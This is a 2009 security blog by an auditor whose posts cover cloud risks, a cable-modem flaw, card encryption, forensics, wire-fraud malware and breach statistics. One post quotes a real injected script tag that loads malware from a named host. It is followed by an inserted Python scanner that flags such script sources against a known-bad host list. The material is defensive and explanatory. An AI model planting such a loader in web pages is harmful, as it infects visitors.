Sister CISA CISSP:

Security

Nov 5 2009   4:52PM GMT

A Not-So-Great Use of Cloud Computing



Posted by: Arian Eigen Heald
Data Breaches, Data Center, data security, cloud computing, cloud security, information security

As I’m sure you know, I’m not yet a big fan of “cloud computing,” known by various acronyms. I have yet to see a really comprehensive approach to audit and security. Ultimately, you don’t know where your data is in the “cloud.” And the Feds have access to it without a warrant.

So you can imagine my dismay when recently reading someone’s suggestion that the shared computing power of the “cloud” could be used to crack encryption algorithms ever so much faster. How will we address this risk?

The risks of audit and control issues, physical security and secure storage of backups, in my mind, outweigh the overhyped benefits. When I see a strong standard implemented by “cloud” vendors, subject to outside independent verification, I’ll get to wow.

Not until then. Where’s the beef?

Oct 21 2009   6:52PM GMT

Using Time-Warner as Your Internet Provider? Check Your Modem QUICKLY



Posted by: Arian Eigen Heald
Stupid Technology, Data Breaches, data security, Wireless, information security, Tearing My Hair Out

As of 10/20/09, a software maven has written of a major security hole (one you can drive a TRUCK through) in the wifi/cable modem models issued to customers who don’t want to use their own equipment.

Here’s the link, in all its details, by David Chen, writing up the vulnerability, which HAS been confirmed by Time-Warner. As of this writing, Time-Warner has no plans to change or resolve the vulnerability.

Here’s the quick version:

The modem: SMC8014 series cable modem/wifi router combination

Issue 1: Time-Warner/SMC has the modem locked down in a default mode which is not accessible to the average user. The default configuration has a default username/password and has locked WEP as the wifi encryption with a standard SSID. (You might as well make the SSID: HACK_ME_I’M_EASY)

Issue 2: Admin access to the modem is disabled via Javascript. When David Chen disabled Javascript in his browser, he could see all the admin features, including something called “Backup Configuration File.”

Issue 3: The backup configuration file comes in a plain text file, which includes the admin ID and password. In plain text.

Issue 4: By default, the web admin interface is accessible from ANYWHERE on the internet. By running a simple port scan of Time Warner IP addresses, David Chen easily found dozens of these routers, open to attack.

So you KNOW that since this has been picked up by Wired, every knucklehead out there will be looking for these routers to play with.

The resolution to this mind-boggling issue that Time-Warner says they can’t do anything about?

Replace the modem - ASAP. And, complain, complain, complain.


Oct 15 2009   5:07PM GMT

End-To-End Encryption - Wouldn’t It Be Nice?



Posted by: Arian Eigen Heald
Data Breaches, data security, information security, PCI

Since Heartland suffered a data breach (disclosed in January), they’ve become the poster child for end-to-end encryption. This is defined as encrypting card information from the moment it’s swiped until it reaches the card issuer. Of course, there may be some motivation provided by the fact that Heartland plans to sell a proprietary end-to-end encryption system by the end of this year. (Not sure I’d buy it from them!)

It sounds like a perfect solution, until you get into the mechanics. And that’s where the problems begin:

Hardware - Are all POS (Point of Sale) registers going to be able to handle the increased load of CPU cycles to encrypt and decrypt? It seems like all the vendors want you to use their hardware.

Software - Not all POS solutions are the same. What about companies that use registers AND online sales? Plus, there is currently no standard for what kind of encryption should be used. So you must go with a proprietary solution all the way through. How many companies can afford to replace so much materiel?

Location, location, location - Where does the data get stored? Can the database decrypt and re-encrypt? What about Call Centers, Fraud Management, or Marketing? They need to look at the information. Ultimately, where are the encryption keys stored and who/what has access to them?

Of the six vendors offering E2E, all of them require changes to POS systems.

And should this technology be implemented, it will not release businesses from complying with PCI. No, a report will still have to be delivered to the acquiring bank on an annual basis, signed by a C-level executive.

There’s no free lunch, it seems.


Sep 25 2009   3:41PM GMT

Things You Can Do to Help An Investigation



Posted by: Arian Eigen Heald
Admins and Auditors, Digital Forensics, information security

Sooner or later, you will be called upon, as an Admin or an Auditor, to assist or address a possible fraud or event pertaining to someone’s computer, laptop, PDA or smartphone. People can be very anxious and over-react when an event is happening. Or, just as difficult, they proceed to do nothing, because they’re not sure what to do.

Neither approach is truly helpful to investigating a forensic fraud, theft or other computer-related incident. I was asked to do an exam, a few years ago, of the hard drives of a CFO who had admitted to fraud and was fired. Her computer sat on her desk, and her secretary AND the company admin both logged into the computer over the course of weeks before we were engaged.

The problem? Every time someone logs in, files get changed. The secretary checked her email; the admin was checking something else. If the company had wanted to prosecute, the evidence on her hard drive was hopelessly muddied and would not have stood up in court.

Here’s the best idea: take the computer and LOCK IT UP. Don’t let it just sit there (so the defense attorney can point out anyone could have logged in) and don’t let people use it. Yes, we might use some volatile data in memory, but many times the computer is already turned off.

If events happen quickly, the fraudster leaves the building with/out access to his/her computer for the last time and it’s still running: LOCK IT UP. If it’s in an office, secure the office and don’t let anyone into it. If it’s in an open area, that’s when you’ll need to power it down and lock it up.

Will these rules fit every situation? Probably not. But they will fit 85%. If you know it’s going to be a forensic situation ahead of time, I hope management lines up someone to come in immediately, who can capture data from a live machine. But if not, and you’re first on the scene, the two rules above are the most important.


Sep 15 2009   2:06PM GMT

Who REALLY Owns Your Data



Posted by: Arian Eigen Heald
cloud computing, cloud security, information security, data security

I had an up-close-and-personal experience today of “cloud computing.” It’s worth thinking about.

I had just finished reading Bruce Schneier’s essay on cloud computing (which is a great read, by the way) and was considering the following point he recently penned in his Cryptogram:

As we move more of our data onto cloud computing platforms such as Gmail and Facebook, and closed proprietary platforms such as the Kindle and the iPhone, deleting data is much harder.

You have to trust that these companies will delete your data when you ask them to, but they’re generally not interested in doing so. Sites like these are more likely to make your data inaccessible than they are to physically delete it. Facebook is a known culprit: actually deleting your data from its servers requires a complicated procedure that may or may not work. And even if you do manage to delete your data, copies are certain to remain in the companies’ backup systems. Gmail explicitly says this in its privacy notice.

What if those companies delete your data because they don’t like it? Or some copyright is at issue and they “can’t” let you keep it, such as Amazon’s now notorious “removal” of the Orwell books due to copyright issues (How ironic is it that Orwell’s books were deleted???)

So, I’m logging into Skydrive this morning because I’m building an online collection of tools I can access when I’m on the road or someplace where I don’t have my computer or USB drives with me.

I’d uploaded about 3 gigs of tools, which might be considered by some to be “hacking” tools, including Cain and Abel (which AV constantly tries to delete). But today, those directories and programs are nowhere to be found.

Big Brother Microsoft evidently doesn’t approve. And this is why we should all consider that if our data in the “cloud” doesn’t pass the vendor’s muster, our data will be deleted.

I’ll stick with my computer, for now.


Sep 9 2009   11:03AM GMT

New Aircrack Just Released



Posted by: Arian Eigen Heald
free tools, Wireless, Tools for Auditing and Security, Tools & Tricks of the Trade, information security

If you’re like me, you’re always hunting for the free tools out there you can add to your arsenal to keep (or in my case, test) the security of your network. Just out, a great addition to my toolset, is a new update to the well-known tool, aircrack-ng.

Why have such a tool, used by the bad guys? Because it’s used by the bad guys to get into your network. It’s updated to crack more protocols, including WPA/PSK. It was one of the first tools to provide a way to crack WEP.

I have about three hundred tools in my toolkit, and only three of them are commercial tools. I’ve had to build a spreadsheet to keep up. I also use Backtrack running in VMWare. You can download VMWare’s free product, the VMWare Viewer, if you have an image (like Backtrack) you just want to run.

I also noticed, while on Vmware’s site, that you can download VMWare server for FREE. They’ll give you some serial numbers, and you can try out all sorts of tools in safety.

It’s good to know how things work.


Aug 30 2009   12:46AM GMT

Securing ALL Your Web Services



Posted by: Arian Eigen Heald
Admins and Auditors, Tools for Auditing and Security, information security

A number of commentators, notably IBM’s Kris Lamb, have reported that malicious code is no longer limited, for the most part, to p0rn and other sleazy websites. Hackers are targeting the more commonly used education, healthcare, blogging and small ecommerce websites where they can come in and insert hostile code which will forward the user’s browser to download malware.

“We’ve reached a tipping point where every website should be viewed as suspicious and every user is at risk,” Lamb said in a statement. “The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity.”

The primary mode of attack appears to be SQL Injection, to which sites still remain vulnerable because handling user input on a website correctly is technically challenging. So the bad guys hack in and drop a script such as:

“script src=http://a0v.org/x.js”

And it runs every time someone visits the page, silently installing malware in the background.

If you run a query in Google, around 60,000 websites have this embedded in their page code. Needless to say, don’t visit any of them. I used Google to check the three websites I support via the “site:” search function. You can, too.

What to do? Use some freeware or shareware to do an initial scan for vulnerabilities. Scan your web pages for odd looking script sources. If you find them, you’ll know your web code is vulnerable somewhere. Set about finding where in a hurry, because the bad guy, or some other bad guy will find it again.
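One way to do the script-source check the paragraph above recommends, as an added example that is not from the original post: parse a saved copy of each page, collect every script src (quoted or not, as in the injected snippet quoted above), and flag anything loaded from a host you did not put there. The allowlist hosts and the sample page are constructed assumptions; the only real host is the a0v.org one quoted in the post.

```python
"""Flag unexpected or known-bad <script src=...> references in saved HTML."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumed allowlist).
ALLOWED_HOSTS = {"example-shop.test", "cdn.example-shop.test"}
# Hosts reported as serving malware; a0v.org is the one named in the post.
KNOWN_BAD_HOSTS = {"a0v.org"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag on a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        for name, value in attrs:  # attribute names arrive lowercased
            if name == "src" and value:
                self.sources.append(value)


def classify_script_sources(html):
    """Return (known_bad, unexpected): script srcs that need attention."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    known_bad, unexpected = [], []
    for src in parser.sources:
        # netloc handles http://, https:// and protocol-relative //host/ forms
        host = urlparse(src).netloc.rsplit("@", 1)[-1].split(":")[0].lower()
        if not host:
            continue  # relative path: served from this site itself
        if host in KNOWN_BAD_HOSTS:
            known_bad.append(src)
        elif host not in ALLOWED_HOSTS:
            unexpected.append(src)
    return known_bad, unexpected


# Constructed sample page: one injected tag written without quotes,
# exactly the way the snippet quoted in the post appears in page source.
SAMPLE_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src=http://a0v.org/x.js></script>
<script src="https://cdn.example-shop.test/lib.js"></script>
<script src="http://stats.unknown-host.test/t.js"></script>
</head><body>Shop</body></html>"""

if __name__ == "__main__":
    bad, odd = classify_script_sources(SAMPLE_PAGE)
    print("known malicious:", bad)
    print("not on allowlist:", odd)
```

A hit in the first list means the page has already been tampered with; a hit in the second is something to explain before the next scan.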

Next, take a look at anything else coming in through your firewall: FTP, email and terminal services/Citrix. Consider any opening a vector for attack, even if you have locked down the external IP sources. Watch the logs carefully and daily.

Finally, watch outbound connections for known sites, such as the one above. Keep your ear out on security sites for the latest of those, and block connections to them from your firewall until they can be shut down.

More work, of course, but much LESS work than a successful attack!


Aug 28 2009   2:02PM GMT

Small Business is Being Targeted



Posted by: Arian Eigen Heald
data security, Data Breaches

The days when you could assume that hackers wouldn’t care because your company was so small have officially gone past. Security by obscurity has passed as well. Now the thieves are looking for small businesses so they can get to the banking accounts and wire money.

I was called on one of these last spring, and it worked like this: the controller got a call from the bank (someone was watching! Yay!) about some wired fund transfers that looked suspicious. After reviewing them, the controller realized fraud and theft had occurred. Other evidence was that the thief had changed the email address back to the controller so that she/he would receive no notification of the wire transfers. It seemed pretty clear that someone had somehow gotten her/his access to the bank account. That was all that could be discovered at the time. They lost over $40,000. That’s small change compared to some of the fraud going on.

Reading an article from the Washington Post, I recognized the scam. It works like this:

“In many cases, the scammers infiltrate companies in a similar fashion: They send a targeted e-mail to the company’s controller or treasurer, a message that contains either a virus-laden attachment or a link that — when opened — surreptitiously installs malicious software designed to steal passwords. Armed with those credentials, the crooks then initiate a series of wire transfers, usually in increments of less than $10,000 to avoid banks’ anti-money-laundering reporting requirements.”

Sounds like exactly what happened to my client. The bad news is that once that money is wired out, there is no way the company can get it back. Losses to small businesses are becoming significant, but have not gotten much press up until this point.

In fact, wire-transfer fraud has gone up 58% in 2008, according to the US Treasury Department. Commercial business customers only have about two days to notify the bank of fraud, and then they eat the loss.

The problem is, Anti-Virus software is not keeping up with malware coming from over the Internet. Thieves are able to use malware to capture even the one-time codes on a fob during a transaction.

An advisory issued by the Financial Services Information Sharing and Analysis Center recommends that commercial banking customers take some fairly rigorous steps to secure their online banking accounts. For example, the group recommends that commercial banking customers “carry out all online banking activity from a standalone, hardened, and locked-down computer from which e-mail and Web browsing is not possible.”

Another option might be VMware, where an image could be loaded for banking use only.


Aug 24 2009   6:31PM GMT

By the Numbers



Posted by: Arian Eigen Heald
Data Breaches, Identity theft, employee theft, information security

I was reading through the list of 2009 reported data breaches/identity theft/etc over on Identitytheft.Info and pondering the patterns that might be visible with a little help of sorting/filtering in Excel.

Part of the problem is that there is no one complete source for gaining hard numbers on medical identity theft, identity theft, data breaches, lost, stolen, etc. Every tracking organization orders their data differently. But just for grins, let’s take this one web page cited above as a source for analysis, and drop it into a spreadsheet.

Between January 2009 and August 18, there is a total of 237 incidents. Without any further analysis, say, as to numbers of people/records exposed, we can draw some interesting conclusions:

58 of those incidents involved theft by owners or employees (about one quarter)
52 happened due to hacked networks, servers or PCs
44 happened due to lost, missing or stolen computer equipment containing PII or CC#
32 were due to paper documents in trash (looked in YOUR dumpster lately?)
21 were due to Web or email exposure - i.e., poor custodian security practices
10 were due to Skimming via CC # or ATMs (including some employee & owners)

There were about 20 that defied this simplistic categorization - my favorite was “patient records left on train.”

The first group (58) interested me greatly; it shows the impact (IMHO) of our economy, and, perhaps, the growing awareness on a public level that credit card numbers and personal data are now worth stealing.

The second one I find fundamentally clueless, because there are excellent whole disk encryption products that are FREE.

I was tempted to combine 52 and 21, but refrained simply because there are zero-day exploits out there.

The most appalling are, of course, the data dumpster droppers. The good news is that there are now data dumpster dropper divers. (Sorry, I couldn’t help it.) At least somebody is looking in dumpsters for this kind of information now. That’s a Good Thing. Anyone who puts that kind of information in the trash should be handcuffed to a shredder, don’t you think?


Aug 20 2009   3:42PM GMT

Points to Ponder: Reviewing the “SoupNazi” Activities



Posted by: Arian Eigen Heald
Admins and Auditors, PCI, Data Breaches, information security

By now I’m sure you’ve heard that Albert Gonzalez is being charged with the attacks on Hannaford, Heartland, 7-Eleven, etc. In between all the excited reporting are some points that admins and auditors ought to pay attention to. We ought to ponder how this attack is different from attacks in the past, and why this attack was so successful.

1. Using a “team.” Most of his team have not been captured, residing as they may somewhere overseas. Using a multiple talent set across several different technical approaches increases the chances of success. This is becoming more and more common, especially with ATM break-ins.

2. They used SQL-injection attacks. This isn’t new, but all of these folks were having quarterly scans from external vendors as part of PCI compliance. Why didn’t the scans catch the injection vulnerabilities? Makes you want to take another look at the scanning company you may be using, doesn’t it?

3. They broke in via wireless. Anyone still using WEP out there - it’s now trivial to crack the protocol, and someone will certainly do it if you offer it up.

4. There’s a big market for those credit cards and the people that can get to them. Over 130 million cards made him a LOT of money.

And we still don’t know “exactly” how he was caught, do we?